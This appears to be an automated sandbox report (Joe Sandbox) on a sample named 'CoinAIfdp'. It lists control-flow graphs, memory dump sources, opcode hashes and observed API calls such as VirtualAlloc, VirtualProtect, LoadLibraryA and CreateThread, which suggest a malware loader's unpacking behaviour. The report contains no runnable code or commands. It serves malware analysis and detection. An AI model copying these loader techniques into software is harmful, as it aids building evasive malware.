                                        execution_graph 21872 5216310 21873 521635d CreateThread 21872->21873 21874 52163df 21873->21874 21875 55b0000 21873->21875 21878 55bcbc5 21875->21878 21877 55b0005 21879 55bcbcf 21878->21879 21880 55c004a 21878->21880 21879->21877 21881 55c006e 21880->21881 21882 55c0158 21880->21882 21916 55c28cb 21881->21916 21892 55c1324 21882->21892 21885 55c0086 21886 55c28cb LoadLibraryA 21885->21886 21891 55c00fe 21885->21891 21887 55c00c8 21886->21887 21888 55c28cb LoadLibraryA 21887->21888 21889 55c00e4 21888->21889 21890 55c28cb LoadLibraryA 21889->21890 21890->21891 21891->21877 21893 55c28cb LoadLibraryA 21892->21893 21894 55c1347 21893->21894 21895 55c28cb LoadLibraryA 21894->21895 21896 55c135f 21895->21896 21897 55c28cb LoadLibraryA 21896->21897 21898 55c137d 21897->21898 21899 55c13a6 21898->21899 21900 55c1392 VirtualAlloc 21898->21900 21899->21891 21900->21899 21902 55c13c0 21900->21902 21901 55c28cb LoadLibraryA 21904 55c143e 21901->21904 21902->21899 21902->21901 21903 55c1494 21903->21899 21905 55c28cb LoadLibraryA 21903->21905 21907 55c14f6 21903->21907 21904->21899 21904->21903 21920 55c26d2 21904->21920 21905->21903 21907->21899 21913 55c1558 21907->21913 21924 55c04b4 21907->21924 21909 55c1664 21951 55c1a54 LoadLibraryA 21909->21951 21911 55c1619 21911->21899 21947 55c1115 21911->21947 21913->21899 21913->21909 21913->21911 21917 55c28e2 21916->21917 21918 55c2909 21917->21918 21957 55c09d0 LoadLibraryA 21917->21957 21918->21885 21921 55c26e7 21920->21921 21922 55c275d LoadLibraryA 21921->21922 21923 55c2767 21921->21923 21922->21923 21923->21904 21925 55c26d2 LoadLibraryA 21924->21925 21926 55c04c8 21925->21926 21929 55c04d0 21926->21929 21952 55c2770 21926->21952 21929->21899 21938 55c05af 21929->21938 21930 55c0506 VirtualProtect 21930->21929 21931 55c051a 21930->21931 21932 55c0534 VirtualProtect 21931->21932 21933 55c2770 LoadLibraryA 21932->21933 21934 55c0555 21933->21934 21934->21929 21935 55c056c VirtualProtect 21934->21935 21935->21929 21936 55c057c 21935->21936 21937 55c0591 VirtualProtect 21936->21937 21937->21929 21939 55c26d2 LoadLibraryA 21938->21939 21940 55c05c5 21939->21940 21941 55c2770 LoadLibraryA 21940->21941 21942 55c05d5 21941->21942 21943 55c05de VirtualProtect 21942->21943 21944 55c0612 21942->21944 21943->21944 21945 55c05ee 21943->21945 21944->21913 21946 55c05fd VirtualProtect 21945->21946 21946->21944 21949 55c1148 21947->21949 21948 55c11f3 21948->21899 21949->21948 21950 55c128e SafeArrayCreate 21949->21950 21950->21948 21951->21899 21953 55c04e8 21952->21953 21954 55c278b 21952->21954 21953->21929 21953->21930 21954->21953 21956 55c0b75 LoadLibraryA 21954->21956 21956->21953 21957->21917 21869 52160e8 21870 5216130 VirtualAlloc 21869->21870 21871 521619c 21870->21871

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 80 2d38b70-2d38b9e 81 2d38ba0 80->81 82 2d38ba5-2d38cc4 80->82 81->82 85 2d38cd3-2d38cdf 82->85 86 2d38cc6-2d38ccd call 2d3b2c3 82->86 87 2d38ce1 85->87 88 2d38ce6-2d38ceb 85->88 86->85 87->88 89 2d38d23-2d38d6c 88->89 90 2d38ced-2d38cf9 88->90 99 2d38d73-2d38f8c 89->99 100 2d38d6e 89->100 91 2d38d00-2d38d1e 90->91 92 2d38cfb 90->92 93 2d3a1d0-2d3a1d6 91->93 92->91 95 2d3a201 93->95 96 2d3a1d8-2d3a1f8 93->96 98 2d3a202 95->98 96->95 98->98 122 2d399bc-2d399c8 99->122 100->99 123 2d38f91-2d38f9d 122->123 124 2d399ce-2d39a06 122->124 125 2d38fa4-2d390c9 123->125 126 2d38f9f 123->126 133 2d39ab5-2d39abb 124->133 160 2d390cb-2d39103 125->160 161 2d39109-2d39192 125->161 126->125 134 2d39ac1-2d39af9 133->134 135 2d39a0b-2d39a36 133->135 148 2d39cf8-2d39cfe 134->148 144 2d39a42-2d39a5d 135->144 145 2d39a90-2d39ab2 144->145 146 2d39a5f-2d39a63 144->146 145->133 146->145 149 2d39a65-2d39a8d 146->149 150 2d39d04-2d39d4c 148->150 151 2d39afe-2d39c29 148->151 149->145 157 2d39dc7-2d39e12 150->157 158 2d39d4e-2d39dc1 150->158 198 2d39c96-2d39c9a 151->198 199 2d39c2b-2d39c94 151->199 180 2d3a19a-2d3a1a0 157->180 158->157 160->161 186 2d391a1-2d39225 161->186 187 2d39194-2d3919c 161->187 182 2d39e17-2d39e99 180->182 183 2d3a1a6-2d3a1ce 180->183 202 2d39ec1-2d39ecd 182->202 203 2d39e9b-2d39eb6 182->203 183->93 221 2d39227-2d3922f 186->221 222 2d39234-2d392b8 186->222 190 2d399ad-2d399b9 187->190 190->122 204 2d39ccc-2d39cde 198->204 205 2d39c9c-2d39cca 198->205 219 2d39cdf-2d39cf5 199->219 207 2d39ed4-2d39ee0 202->207 208 2d39ecf 202->208 203->202 204->219 205->219 210 2d39ef3-2d39f02 207->210 211 2d39ee2-2d39eee 207->211 208->207 217 2d39f04 210->217 218 2d39f0b-2d3a162 210->218 215 2d3a181-2d3a197 211->215 215->180 217->218 223 2d39f11-2d39f4f 217->223 224 2d39fd1-2d3a03a 217->224 225 2d39f54-2d39fcc 217->225 226 2d3a03f-2d3a0a8 217->226 227 2d3a0ad-2d3a0ea 217->227 249 2d3a16d-2d3a179 218->249 219->148 221->190 261 2d392c7-2d3934b 222->261 262 2d392ba-2d392c2 222->262 223->249 224->249 225->249 226->249 248 2d3a133-2d3a139 227->248 252 2d3a13b-2d3a145 248->252 253 2d3a0ec-2d3a11f 248->253 249->215 252->249 258 2d3a121 253->258 259 2d3a126-2d3a130 253->259 258->259 259->248 268 2d3935a-2d393de 261->268 269 2d3934d-2d39355 261->269 262->190 275 2d393e0-2d393e8 268->275 276 2d393ed-2d39471 268->276 269->190 275->190 282 2d39473-2d3947b 276->282 283 2d39480-2d39504 276->283 282->190 289 2d39513-2d39597 283->289 290 2d39506-2d3950e 283->290 296 2d395a6-2d3962a 289->296 297 2d39599-2d395a1 289->297 290->190 303 2d39639-2d396bd 296->303 304 2d3962c-2d39634 296->304 297->190 310 2d396bf-2d396c7 303->310 311 2d396cc-2d39750 303->311 304->190 310->190 317 2d39752-2d3975a 311->317 318 2d3975f-2d397e3 311->318 317->190 324 2d397f2-2d39876 318->324 325 2d397e5-2d397ed 318->325 331 2d39885-2d39909 324->331 332 2d39878-2d39880 324->332 325->190 338 2d3990b-2d39913 331->338 339 2d39918-2d3999c 331->339 332->190 338->190 345 2d399a8-2d399aa 339->345 346 2d3999e-2d399a6 339->346 345->190 346->190
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2
                                        • API String ID: 0-450215437
                                        • Opcode ID: b7f60185639dbebc1798bce4d148a09977f10fc1b97e28c6d4d80765271e9c2d
                                        • Instruction ID: 22f89d6d570cb947b425252932ab8e1d18c7c116e8c217484b1d9e5efaa27adc
                                        • Opcode Fuzzy Hash: b7f60185639dbebc1798bce4d148a09977f10fc1b97e28c6d4d80765271e9c2d
                                        • Instruction Fuzzy Hash: B9D2E4B4A012288FDB65DF69D844B9EBBF6FB88304F1081E9D549A7358DB309E81CF50
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76e142a34bbb681a2c3a40672f50ce41ea67a6c63f9be3a93a301a6fc40a32c9
                                        • Instruction ID: 8c111eb6ab98954b221543bede1edc4159a92ba278c178ec0bb7d221a3272f70
                                        • Opcode Fuzzy Hash: 76e142a34bbb681a2c3a40672f50ce41ea67a6c63f9be3a93a301a6fc40a32c9
                                        • Instruction Fuzzy Hash: 82A2B275A00228CFDB65CF69C984B99BBB2FF89304F1581E9D549AB325DB319E81CF40
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43a6e4ce03b363b36e0cd637ffa4c3f1dbbcd4f3ab4b8b7815b2ffc2a8bb2d72
                                        • Instruction ID: e5c572c5d27bcd5d737448591677c488eadeaaef2e77a8f6ad1b804bb996e4c3
                                        • Opcode Fuzzy Hash: 43a6e4ce03b363b36e0cd637ffa4c3f1dbbcd4f3ab4b8b7815b2ffc2a8bb2d72
                                        • Instruction Fuzzy Hash: 9F42A574A04229CFDB65DF28C989B99BBB6FB88300F1081D9D58DA7355DB30AE81CF54
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2116a5773185538b6267af687b39ff782a2e8641dd42df155b39d9de7b6bacc
                                        • Instruction ID: 97e110868f8d586f14550268cc1e8c3496b7e61861a5939f17e838d05f6c79b4
                                        • Opcode Fuzzy Hash: a2116a5773185538b6267af687b39ff782a2e8641dd42df155b39d9de7b6bacc
                                        • Instruction Fuzzy Hash: 23C1DDB0D06268CFDB65CFA9C944BD9BBF2AB89314F1080A9945DAB354D7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 29091100bcf5f5160929cb5ab9d618fdd22b50f46e5c16e7e68542ea6939c057
                                        • Instruction ID: 7517ce4f3cadebfacb89655eb1742068df46d0096e15ded5a3a8cb41d4546cdf
                                        • Opcode Fuzzy Hash: 29091100bcf5f5160929cb5ab9d618fdd22b50f46e5c16e7e68542ea6939c057
                                        • Instruction Fuzzy Hash: EC51C9B1E016188BEB28CF6BD84579AFAF3BFC8304F14C1A9D548AB259DB344985CF54
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c731610b9d873c6b81867e11a2299bacf04e96f5e3023f5a36ffe1ee0252dc1b
                                        • Instruction ID: 901e70d12f9169caccb519444d80a3844f2c55c868e82bb52f2a0ea75d3f32d9
                                        • Opcode Fuzzy Hash: c731610b9d873c6b81867e11a2299bacf04e96f5e3023f5a36ffe1ee0252dc1b
                                        • Instruction Fuzzy Hash: 6E21B471E056088BEB59CFAAC94479EBBF7BF88300F14C07A9419AB265EB745546CF40

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 055C26D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 055C2764
                                        • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 055C050F
                                        • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 055C0542
                                        • VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 055C0575
                                        • VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 055C059F
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55b0000_CoinAIfdp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProtectVirtual$LibraryLoad
                                        • String ID:
                                        • API String ID: 895956442-0
                                        • Opcode ID: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
                                        • Instruction ID: 55595de2c6eb68ad8bc0d1f92f27bfdd6c5b2ac4e7f1e14496ccf34792fef4fe
                                        • Opcode Fuzzy Hash: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
                                        • Instruction Fuzzy Hash: 0621886620421ABFE210A9E19C48F7F7ADCFB85305F04047EBA86D51A1EB65AA058671

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 26 55c26d2-55c26e5 27 55c26fd-55c2707 26->27 28 55c26e7-55c26ea 26->28 30 55c2709-55c2711 27->30 31 55c2716-55c2722 27->31 29 55c26ec-55c26ef 28->29 29->27 32 55c26f1-55c26fb 29->32 30->31 33 55c2725-55c272a 31->33 32->27 32->29 34 55c272c-55c2737 33->34 35 55c275d-55c2764 LoadLibraryA 33->35 37 55c2739-55c2751 call 55c2da0 34->37 38 55c2753-55c2757 34->38 36 55c2767-55c276b 35->36 37->38 42 55c276c-55c276e 37->42 38->33 40 55c2759-55c275b 38->40 40->35 40->36 42->36
                                        APIs
                                        • LoadLibraryA.KERNEL32(00000000,?,?), ref: 055C2764
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55b0000_CoinAIfdp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: .dll
                                        • API String ID: 1029625771-2738580789
                                        • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                        • Instruction ID: 8e0a60196244cb5c726819c02a5992aeefb6faa22eda7b28800c3ecc26265145
                                        • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                        • Instruction Fuzzy Hash: 4A21B47D6043859FDB21CFECC884B6ABFE4BF05364F1881ADD8968BA41D730E8458B90

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 055C26D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 055C2764
                                        • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 055C05E7
                                        • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 055C060A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55b0000_CoinAIfdp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProtectVirtual$LibraryLoad
                                        • String ID:
                                        • API String ID: 895956442-0
                                        • Opcode ID: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                                        • Instruction ID: 5a641f7c9d7b7983aa2d66de08f559a54207aee80d1af940a39ce6083e909761
                                        • Opcode Fuzzy Hash: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                                        • Instruction Fuzzy Hash: 9DF081B6200608BEE611AAA5CC45FFB3AACEF85B50F40045CFB46D6090EA65AA4186B5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 54 55d71d0-55d71d7 55 55d71dd-55d71de 54->55 56 55de417-55de452 54->56 55->56 61 55de45a-55de461 56->61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$Y
                                        • API String ID: 0-947205236
                                        • Opcode ID: 3833fbb7aa57dd82b98e78c8bd9560dfc27a403edf9454c6e308ae0db1c4a2fa
                                        • Instruction ID: 75079898b60b210ca3016ff092ef5261b4c9a2fe1061dc68dadf685ab6193fa3
                                        • Opcode Fuzzy Hash: 3833fbb7aa57dd82b98e78c8bd9560dfc27a403edf9454c6e308ae0db1c4a2fa
                                        • Instruction Fuzzy Hash: C6F0F8349552289FDB24DF54C8AD7A9BB76BF44345F400498D00A27290EF346E84DF10

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 62 55d0506-55d053f 65 55d00fc-55d0107 62->65 66 55d0545-55d0550 62->66 67 55d0109-55d452c call 55eff80 65->67 68 55d0110-55d0389 65->68 66->65 72 55d4532-55d4574 67->72 68->65 77 55d038f-55d039a 68->77 72->65 78 55d457a-55d4585 72->78 77->65 78->65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630297393.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55d0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: X$h
                                        • API String ID: 0-795848406
                                        • Opcode ID: 9ce9d1e4e5fd36bab3d26e2e73c4c2d65b07c87b3b1351630e15a5f9347ce8aa
                                        • Instruction ID: 20d232a510a2b17027f45bf933cfc8265f8420b8f4e3dcb579de84fb43dd67ba
                                        • Opcode Fuzzy Hash: 9ce9d1e4e5fd36bab3d26e2e73c4c2d65b07c87b3b1351630e15a5f9347ce8aa
                                        • Instruction Fuzzy Hash: 45F03234850229CFDB38DF18C858BAABBB2FB04305F0044E5C809A32D0E7790E88DF12

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 348 55c1115-55c1142 349 55c1148-55c115b 348->349 350 55c11ca-55c11d1 348->350 356 55c11fe-55c1201 349->356 357 55c1161-55c118d call 55c26ad 349->357 351 55c11ef-55c11f1 350->351 352 55c11d3-55c11e7 350->352 354 55c1203-55c120e 351->354 355 55c11f3-55c11f9 351->355 352->351 362 55c1214-55c1220 354->362 363 55c1315 354->363 358 55c1319-55c1323 355->358 356->352 368 55c118f-55c119e 357->368 369 55c11c3 357->369 364 55c122e-55c1269 call 55c26ad 362->364 365 55c1222-55c1227 362->365 363->358 372 55c126c-55c126e 364->372 370 55c122c 365->370 368->352 377 55c11a0-55c11a5 368->377 373 55c11c6-55c11c8 369->373 370->372 372->363 375 55c1274-55c1288 372->375 373->350 373->352 375->363 381 55c128e-55c12b0 SafeArrayCreate 375->381 377->373 380 55c11a7-55c11c1 377->380 380->373 381->363 383 55c12b2-55c12bd 381->383 385 55c12bf-55c12d0 383->385 386 55c12d2-55c12db 383->386 385->385 385->386 390 55c12dd call 10ed7f0 386->390 391 55c12dd call 10ed7f1 386->391 387 55c12e3-55c12f9 388 55c130e 387->388 389 55c12fb-55c130c 387->389 388->363 389->388 389->389 390->387 391->387
                                        APIs
                                        • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 055C12A6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55b0000_CoinAIfdp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ArrayCreateSafe
                                        • String ID:
                                        • API String ID: 37945469-0
                                        • Opcode ID: 3a71c02433a8139c968cc3f30c4dd14e73a6b67554079fc4c70d085402dfb9e4
                                        • Instruction ID: 1ca2487385661577598bef173c89b7349d63590d48f105cd0f775300262e0cae
                                        • Opcode Fuzzy Hash: 3a71c02433a8139c968cc3f30c4dd14e73a6b67554079fc4c70d085402dfb9e4
                                        • Instruction Fuzzy Hash: 6F617C71604606AFD714DFA0C884FA7BBE8BF49305F1485ADE94ACB105DB34E905CFA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 392 5216309-52163dd CreateThread 395 52163e6-521641e 392->395 396 52163df-52163e5 392->396 396->395
                                        APIs
                                        • CreateThread.KERNEL32(?,?,?,?,?,?), ref: 052163CD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1629931607.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5210000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: d4d0fc26ec482bd3495c2f9fce7f4459eb0897c2cc57243a86eb9242338cc9bf
                                        • Instruction ID: bbec835f6e322f29cdbbae3352b454b6a680e88acf5e991c296d38acf87ee10a
                                        • Opcode Fuzzy Hash: d4d0fc26ec482bd3495c2f9fce7f4459eb0897c2cc57243a86eb9242338cc9bf
                                        • Instruction Fuzzy Hash: B24168B9D042589FCF10CFA9D984ADEFBF5BF19310F14A02AE814B7210D375A9458B64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 399 5216310-52163dd CreateThread 401 52163e6-521641e 399->401 402 52163df-52163e5 399->402 402->401
                                        APIs
                                        • CreateThread.KERNEL32(?,?,?,?,?,?), ref: 052163CD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1629931607.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5210000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 70291a23e0a3fe08d7f00fff11d0282eb626d11b798c3856fff92a43dca2d23c
                                        • Instruction ID: 9376149dd9412617ee6251d3194c12e408ddb55d8465532a6b904d405d430722
                                        • Opcode Fuzzy Hash: 70291a23e0a3fe08d7f00fff11d0282eb626d11b798c3856fff92a43dca2d23c
                                        • Instruction Fuzzy Hash: EA4157B9D042589FCF10CFA9D984A9EFBF1BF19310F14A02AE819B7210D375A945CF68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 405 55c1324-55c1388 call 55c28cb * 3 412 55c138a-55c138c 405->412 413 55c13b2 405->413 412->413 414 55c138e-55c1390 412->414 415 55c13b5-55c13bf 413->415 414->413 416 55c1392-55c13a4 VirtualAlloc 414->416 417 55c13a6-55c13ad 416->417 418 55c13c0-55c13e3 call 55c2d40 call 55c2d64 416->418 417->413 419 55c13af 417->419 424 55c142d-55c1446 call 55c28cb 418->424 425 55c13e5-55c141b call 55c2a38 call 55c290e 418->425 419->413 424->413 431 55c144c 424->431 434 55c167c-55c1685 425->434 435 55c1421-55c1427 425->435 433 55c1452-55c1458 431->433 436 55c145a-55c1460 433->436 437 55c1494-55c149d 433->437 440 55c168c-55c1694 434->440 441 55c1687-55c168a 434->441 435->424 435->434 442 55c1462-55c1465 436->442 438 55c149f-55c14a5 437->438 439 55c14f6-55c1501 437->439 445 55c14a9-55c14c4 call 55c28cb 438->445 448 55c151a-55c151d 439->448 449 55c1503-55c150c call 55c0618 439->449 446 55c16c3 440->446 447 55c1696-55c16c1 call 55c2d64 440->447 441->440 441->446 443 55c1479-55c147b 442->443 444 55c1467-55c146c 442->444 443->437 453 55c147d-55c148b call 55c26d2 443->453 444->443 452 55c146e-55c1477 444->452 470 55c14c6-55c14ce 445->470 471 55c14e3-55c14f4 445->471 450 55c16c7-55c16e7 call 55c2d64 446->450 447->450 454 55c1678 448->454 455 55c1523-55c152c 448->455 449->454 466 55c1512-55c1518 449->466 484 55c16ed-55c16ef 450->484 485 55c16e9 450->485 452->442 452->443 467 55c1490-55c1492 453->467 454->434 461 55c152e 455->461 462 55c1532-55c1539 455->462 461->462 468 55c1569-55c156d 462->468 469 55c153b-55c1544 call 55c04b4 462->469 466->462 467->433 472 55c160f-55c1612 468->472 473 55c1573-55c1595 468->473 486 55c1546-55c154c 469->486 487 55c1552-55c1553 call 55c05af 469->487 470->454 475 55c14d4-55c14dd 470->475 471->439 471->445 477 55c1664-55c1666 call 55c1a54 472->477 478 55c1614-55c1617 472->478 473->454 491 55c159b-55c15ae call 55c2d40 473->491 475->454 475->471 490 55c166b-55c166c 477->490 478->477 481 55c1619-55c161c 478->481 488 55c161e-55c1620 481->488 489 55c1635-55c1646 call 55c1115 481->489 484->415 485->484 486->454 486->487 497 55c1558-55c155b 487->497 488->489 493 55c1622-55c1625 488->493 507 55c1648-55c164f call 55c16f4 489->507 508 55c1657-55c1662 call 55c0be1 489->508 494 55c166d-55c1674 490->494 505 55c15b0-55c15b4 491->505 506 55c15d2-55c160b 491->506 498 55c162c-55c1633 call 55c22c2 493->498 499 55c1627-55c162a 493->499 494->454 500 55c1676 494->500 497->468 503 55c155d-55c1563 497->503 498->490 499->494 499->498 500->500 503->454 503->468 505->506 510 55c15b6-55c15b9 505->510 506->454 518 55c160d 506->518 516 55c1654 507->516 508->490 510->472 514 55c15bb-55c15d0 call 55c2b43 510->514 514->518 516->508 518->472
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 055C139E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_55b0000_CoinAIfdp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
                                        • Instruction ID: 53f005cf3259baf9df3b71faacfae92bd04c0917434c34461de8c2b9d3b2cffa
                                        • Opcode Fuzzy Hash: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
                                        • Instruction Fuzzy Hash: 8DB1C171604F02AFD7219AE0CC84FBBBFA9FF45300F18099DE59A96552E731E590CBA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: 3544aa59c27df15b4824d82d0250460824197dd53d78d5adafd416e6aaffcdd3
                                        • Instruction ID: 65070c2629ce5b0e97001eb73ec7eb01feb24b8130ca960ed828e9cdeaa7671c
                                        • Opcode Fuzzy Hash: 3544aa59c27df15b4824d82d0250460824197dd53d78d5adafd416e6aaffcdd3
                                        • Instruction Fuzzy Hash: C8A1BDB4906268CFDB61CFA8C984BDCBBF2AB49314F109099D459AB354C7749ED8CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 710 2d319ea 711 2d319f6-2d31a25 710->711 712 2d31a27-2d31a3d 711->712 713 2d31a3f-2d31a4b 711->713 714 2d31a55-2d31a69 712->714 713->714 753 2d31a6f call 2d36148 714->753 754 2d31a6f call 2d36138 714->754 715 2d31a75-2d31aa0 717 2d31aa2 715->717 718 2d31aa7-2d31ab5 715->718 717->718 719 2d31ab7 718->719 720 2d31abc-2d31aca 718->720 719->720 721 2d31ad1-2d31adf 720->721 722 2d31acc 720->722 723 2d31ae1 721->723 724 2d31ae6-2d31b2e 721->724 722->721 723->724 727 2d31b30 724->727 728 2d31b35-2d31b43 724->728 727->728 729 2d31b45 728->729 730 2d31b4a-2d31b58 728->730 729->730 731 2d31b5a 730->731 732 2d31b5f-2d31b6d 730->732 731->732 733 2d31b74-2d31b82 732->733 734 2d31b6f 732->734 735 2d31b84 733->735 736 2d31b89-2d31b97 733->736 734->733 735->736 737 2d31b99 736->737 738 2d31b9e-2d31bac 736->738 737->738 739 2d31bb3-2d31bc1 738->739 740 2d31bae 738->740 741 2d31bc3 739->741 742 2d31bc8-2d31be5 739->742 740->739 741->742 744 2d31bf1-2d31c17 742->744 755 2d31c1d call 2d36148 744->755 756 2d31c1d call 2d36138 744->756 745 2d31c23 746 2d31c2f-2d31c44 745->746 757 2d31c4a call 2d36148 746->757 758 2d31c4a call 2d36138 746->758 747 2d31c50-2d31ca9 750 2d319c6-2d319db 747->750 751 2d31caf-2d31cb0 747->751 750->710 753->715 754->715 755->745 756->745 757->747 758->747
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1627859445.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d30000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `
                                        • API String ID: 0-2679148245
                                        • Opcode ID: 6cc3ff579619d3638c53c653c1b7025384eeb1a289c2c07bf731379bd8286512
